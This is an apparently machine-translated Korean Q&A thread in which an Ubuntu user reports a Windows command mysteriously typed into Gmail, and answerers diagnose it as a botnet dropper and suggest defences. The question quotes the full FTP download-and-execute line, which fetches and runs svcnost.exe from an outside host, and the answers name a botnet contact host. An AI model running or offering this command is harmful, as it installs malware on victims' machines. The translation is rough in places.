Linux 컴퓨터가 해킹되었는지 확인하는 방법

집에있는 PC는 보통 켜져 있지만 모니터는 꺼져 있습니다. 오늘 저녁 나는 직장에서 집으로 돌아와서 해킹 시도처럼 보이는 것을 발견했습니다. 브라우저에서 내 Gmail이 열려 있었지만 TO필드에 다음과 같이 작성 모드에있었습니다 .

md / c echo open cCTeamFtp.yi.org 21 >> ik & echo 사용자 ccteam10 765824 >> ik & echo 바이너리 >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s : ik & del ik & svcnost.exe & exit echo 소유하고 있습니다

이것은 나에게 Windows 명령 줄 코드처럼 보이고 코드 md시작은 Gmail이 작성 모드에 있다는 사실과 결합되어 누군가가 cmd명령 을 실행하려고 시도했음을 분명히합니다 . 실제로이 PC에서 Windows를 실행하지는 않지만 운이 좋을 것 같습니다. 이런 일이 저에게 일어난 것은 이번이 처음입니다. 저는 Linux 전문가가 아니며 당시 Firefox 이외의 다른 프로그램은 실행하지 않았습니다.

나는 이것을 쓰지 않았다는 것을 확실히 확신하며, 아무도 내 컴퓨터에 실제로 아무도 없었다. 또한 최근에 Google 비밀번호 (및 기타 모든 비밀번호)를 다른 것으로 변경 vMA8ogd7bv하여 누군가 내 Google 계정을 해킹했다고 생각하지 않습니다.

무슨 일이야? 수년 동안 맬웨어를 실행 한 할머니의 오래된 Windows 컴퓨터가 아니라 최근에 새로운 Ubuntu를 설치할 때 누군가 내 컴퓨터에 키 입력을 어떻게합니까?

업데이트 :
몇 가지 요점과 질문을 설명하겠습니다.

• 저는 시골, 오스트리아에 있습니다. 내 WLAN 라우터는 사전에없는 WPA2 / PSK 와 중간 수준의 암호를 실행합니다. 여기에서 50 미터 미만의 무차별 적이어야합니다. 해킹 당했을 가능성은 없습니다.
• 나는 USB 유선 키보드를 사용하고 있기 때문에 아무도 그것을 해킹 할 수있는 범위 내에있을 가능성이 거의 없습니다.
• 당시에는 컴퓨터를 사용하지 않았습니다. 내가 일하는 동안 그냥 집에서 유휴 상태였습니다. 모니터에 장착 된 넷탑 PC이므로 거의 끄지 않습니다.
• 기계는 두 달 밖에 안되어 우분투 만 실행하며 이상한 소프트웨어를 사용하거나 이상한 사이트를 방문하지 않습니다. 주로 스택 교환, Gmail 및 신문입니다. 게임이 없습니다. 우분투는 최신 상태를 유지하도록 설정되어 있습니다.
• VNC 서비스 실행에 대해 잘 모르겠습니다. 확실히 설치하거나 활성화하지 않았습니다. 다른 서버도 시작하지 않았습니다. 기본적으로 우분투에서 실행 중인지 확실하지 않습니까?
• Gmail 계정 활동의 모든 IP 주소를 알고 있습니다. 나는 구글이 진입로가 아니라고 확신한다.
• Log File Viewer를 찾았 지만 무엇을 찾아야할지 모르겠습니다. 도움?

내가 정말로 알고 싶은 것은, 그리고 내가 실제로 안전하지 않다고 느끼는 것은 : 인터넷의 누군가가 어떻게 내 컴퓨터에서 키 스트로크를 생성 할 수 있는가? 모든 정보를 망설이지 않고 어떻게 방지 할 수 있습니까? 저는 Linux 괴짜가 아닙니다. 저는 20 년 이상 Windows를 엉망으로 지친 아버지입니다. 온라인에서 18 년 동안 온라인에서 해킹 시도를 한 번도 본 적이 없기 때문에 이것은 새로운 것입니다.

걱정할 점이없는 것 같습니다. 다운로드 로 드라이브 를 시도한 것은 JavaScript 공격 일 가능성이 높습니다 . 이 문제가 걱정된다면 NoScript 및 AdBlock Plus Firefox 애드온을 사용하십시오.

신뢰할 수있는 사이트를 방문하더라도 악의적 일 수있는 타사 광고주의 JavaScript 코드를 실행하기 때문에 안전하지 않습니다.

나는 그것을 잡고 VM에서 실행했다. 그것은 mirc를 설치했고 이것은 상태 로그입니다 ... http://pastebin.com/Mn85akMk

mIRC를 다운로드하고 봇넷에 가입하여 스팸봇으로 전환시키려는 자동 공격입니다. VM에 가입하여 여러 원격 주소 중 하나에 연결했습니다 autoemail-119.west320.com.

Windows 7에서 실행하려면 UAC 프롬프트를 수락하고 방화벽을 통한 액세스를 허용해야했습니다.

다른 포럼에는이 정확한 명령에 대한 수많은 보고서가있는 것으로 보이며 누군가 토렌트 파일이 다운로드가 완료되면 파일을 실행하려고 시도했다고 말합니다.하지만 어떻게 가능한지 잘 모르겠습니다.

나는 이것을 직접 사용하지는 않았지만 현재 네트워크 연결을 보여줄 수 있어야 표준 이외의 것에 연결되어 있는지 확인할 수 있습니다 : http://netactview.sourceforge.net/download.html

@ jb48394에 동의합니다 . 요즘 다른 모든 것과 마찬가지로 JavaScript 악용 일 수 있습니다.

cmd창 을 열고 ( @ torbengb 's comment 참조 ) 트로이 목마를 신중하게 백그라운드에서 다운로드하는 대신 악의적 인 명령을 실행한다는 사실 은 Firefox의 일부 취약성을 악용하여 키 입력을 할 수 있음을 시사 하지만 코드를 실행하지 마십시오.

이것은 또한이 된, 악용 이유를 설명 명확하게 리눅스에서 일하는 것, 윈도우 전용으로 작성 : 파이어 폭스 자바 스크립트를 모든 OS'es에서 같은 방법으로 실행 (적어도, 그것은 :)을 시도) . Windows 용 버퍼 오버플로 또는 이와 유사한 익스플로잇으로 인해 프로그램이 중단되었을 수 있습니다.

JavaScript 코드의 출처는 악의적 인 Google 광고 일 것입니다 (하루 내내 Gmail의 광고주기) . 그것은 하지 않을 수 첫 번째 시간 .

다른 Linux 시스템 에서 비슷한 공격 을 발견 했습니다 . 그것은 일종의 Windows 용 FTP 명령 인 것 같습니다.

이것은 전체 질문에 대한 답은 아니지만 로그 파일에서 실패한 로그온 시도를 찾습니다.

로그에 5 번 이상 실패한 시도가 있으면 누군가가 크랙을 시도했습니다 root. root컴퓨터를 사용하지 않을 때 성공적으로 로그온을 시도하면 즉시 암호를 변경하십시오 !! 지금 당장! 바람직하게는 영숫자, 길이는 약 10 자입니다.

당신이받은 메시지 ( echo명령)로, 이것은 실제로 미숙 한 스크립트 kiddie 처럼 들립니다 . 자신이하고있는 일을 아는 사람이 진짜 해커라면 아마 그 사실을 알지 못할 것입니다.

whois west320.com은 Microsoft 소유입니다.

UPnP 와 Vino (시스템-> 환경 설정-> 원격 데스크톱)가 약한 우분투 암호와 결합 되었습니까?

비표준 리포지토리를 사용 했습니까?

DEF CON 은 매년 Wi-Fi 액세스 포인트에 도달 할 수있는 거리에 대해 Wi-Fi 경쟁을합니다. 마지막으로 250 마일이라고 들었습니다.

정말로 두려워하고 싶다면 Zeus 봇넷 의 명령 제어 센터의 스크린 샷을보십시오 . 안전한 컴퓨터는 없지만 Linux의 Firefox는 다른 것보다 안전합니다. SELinux 를 실행하면 더 좋습니다 .